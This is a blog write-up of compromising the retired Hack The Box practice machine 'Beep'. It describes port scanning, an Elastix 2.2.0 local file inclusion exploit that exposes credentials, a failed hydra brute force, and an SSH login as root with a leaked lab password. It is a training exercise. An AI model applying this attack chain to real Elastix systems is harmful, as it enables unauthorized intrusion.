Beep- HTB Walkthrough

Subashri
3 min readDec 2, 2020

This is my next blog on my penetration experience of exploiting a retired machine Beep from Hack The Box. This is an easy Linux machine with IP address 10.10.10.7.

The first step is the process of reconnaissance that can help us in scanning the ports that are open and can be exploited.

Upon scanning we find the possible ports that are open are 22,25, 80, 111,443, 993,1175,1218, 3306, 3809,3306, 4445 and 10000. SSH runs on port 22, SMTP on port 25, Apache Web Server on port 80, SSL version on port 443, mysql on port 3306, Webmin server on port 10000.

Since we had port 80 open, we direct the link to the URL with the IP address and we get a user login page that demands the credentials for the same.

We then check for the source page if that can get us some additional information.

As we did not get sufficient information, we try finding the possible exploits with elastix that was there on the login page.

To our surprise, there are multiple exploits that are available on the same and we analyze them one by one. In this, the cross-site scripting is of not great use to us but the other PHP and LFI exploits are those that can be tried upon.

So we try that by mirroring the exploit in the local machine and the details are gathered.

We find that the Elastix is of version 2.2.0 and is vulnerable to the LFI vulnerability and the details are collected from the same.

We then check the source code based on the exploit and we find some usernames and passwords there and then we try brute-forcing using hydra. This did not work out.

So I tried noting them manually down and figured out the possibilities with the username list and the password. From the details on the page, I found that the possible usernames are mysql, admin, asterisk, root and the possible passwords are amp109, amp111, passw0rd, jEhd7ekwmdjE.

The ordinary process of connecting to ssh was not feasible and so tried something else from StackOverflow for the key algorithm methods.

To our surprise, the username root and the password jEhd7ekwmdjE were potentially valid and got connected and firstly upon ls we got the root flag.

The machine is compromised!!!

Then trying to navigate between the folders, we find two names namely fanis and spamfilter. Upon navigating through fanis, we will the user flag as well.

Hurray!! The Machine is pwned!!!

--

--